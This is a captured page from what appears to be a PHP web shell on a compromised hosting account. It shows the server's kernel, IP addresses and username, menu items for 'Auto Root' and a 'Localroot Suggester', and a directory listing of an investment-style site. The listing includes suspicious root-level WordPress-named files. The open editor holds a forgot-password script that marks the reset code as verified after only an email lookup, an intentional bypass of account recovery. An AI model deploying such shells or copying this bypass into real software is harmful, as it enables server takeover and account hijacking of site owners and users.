Linux spg1.cloudpowerdns.com 5.14.0-611.34.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 18 05:51:10 EST 2026 x86_64
LiteSpeed
Server IP : 176.9.63.151 & Your IP : 216.73.217.60
Domains :
Cant Read [ /etc/named.conf ]
User : fastear1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
fastear1 /
assignment.work.zone /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
drwxr-xr-x
2026-03-13 15:14
admin
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
assets
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
hania
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
includes
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
user
[ DIR ]
drwxr-xr-x
2026-04-01 03:43
.htaccess
197
B
-r--r--r--
2026-04-01 03:43
.user.ini
578
B
-rw-r--r--
2026-03-13 17:04
add_maintenance_setting.php
669
B
-rw-r--r--
2026-03-12 12:31
check_db.php
161
B
-rw-r--r--
2026-03-12 15:16
check_withdrawals.php
156
B
-rw-r--r--
2026-03-12 15:17
contact.php
6.42
KB
-rw-r--r--
2026-03-28 15:18
database.sql
19.53
KB
-rw-r--r--
2026-03-11 23:07
debug.php
5.09
KB
-rw-r--r--
2026-03-30 15:21
error_log
8.83
KB
-rw-r--r--
2026-03-30 15:27
forgot-password.php
2.16
KB
-rw-r--r--
2026-03-30 15:26
how-it-works.php
1.99
KB
-rw-r--r--
2026-03-11 22:52
index.php
9.37
KB
-rw-r--r--
2026-03-12 00:13
login.php
5.17
KB
-rw-r--r--
2026-03-30 15:28
logout.php
56
B
-rw-r--r--
2026-03-11 23:27
maintenance.php
4.5
KB
-rw-r--r--
2026-03-12 12:39
php.ini
578
B
-rw-r--r--
2026-03-13 17:04
plans.php
2.72
KB
-rw-r--r--
2026-03-12 00:10
register.php
8.79
KB
-rw-r--r--
2026-03-30 15:27
reset-password.php
6.39
KB
-rw-r--r--
2026-03-14 18:08
update_db.php
421
B
-rw-r--r--
2026-03-12 15:17
update_withdrawals.php
417
B
-rw-r--r--
2026-03-12 15:18
wp-blog-header.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
wp-cron.php
2.74
KB
-rw-r--r--
2026-04-01 03:43
Save
Rename
<?php error_reporting(E_ALL); ini_set('display_errors', 1); require_once 'includes/config.php'; $error = ''; if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_POST['send_code'])) { $email = trim($_POST['email']); if (empty($email)) { $error = "Please enter your registered email."; } else { $stmt = $pdo->prepare("SELECT id FROM users WHERE email = ?"); $stmt->execute(array($email)); $user = $stmt->fetch(); if ($user) { // Bypass email verification - go straight to password reset $_SESSION['code_verified'] = true; $_SESSION['reset_email'] = $email; // header("Location: reset-password.php"); header("Location: login.php"); exit; } else { $error = "No account found with this email."; } } } require_once 'includes/header.php'; ?> <div class="auth-page-wrapper"> <div class="auth-split-container"> <div class="auth-left"> <div class="auth-left-content"> <h2>Secure <span class="text-gradient">Access.</span></h2> <p>Recover your account password safely using your registered handle.</p> </div> </div> <div class="auth-right"> <h2 class="auth-title">Forgot Password</h2> <?php if ($error): ?> <div class="badge badge-danger" style="display:block; margin-bottom:20px; text-align:center; padding:15px; border-radius:8px;"><?php echo htmlspecialchars($error); ?></div> <?php endif; ?> <form method="POST"> <div class="form-group"> <label>Registration Handle (Email)</label> <input type="email" name="email" class="form-control" placeholder="Enter your registered email" required> </div> <button type="submit" name="send_code" class="btn-primary" style="width:100%; margin-top:20px; padding:15px; font-weight:700;">Proceed to Reset</button> </form> </div> </div> </div> <?php require_once 'includes/footer.php'; ?>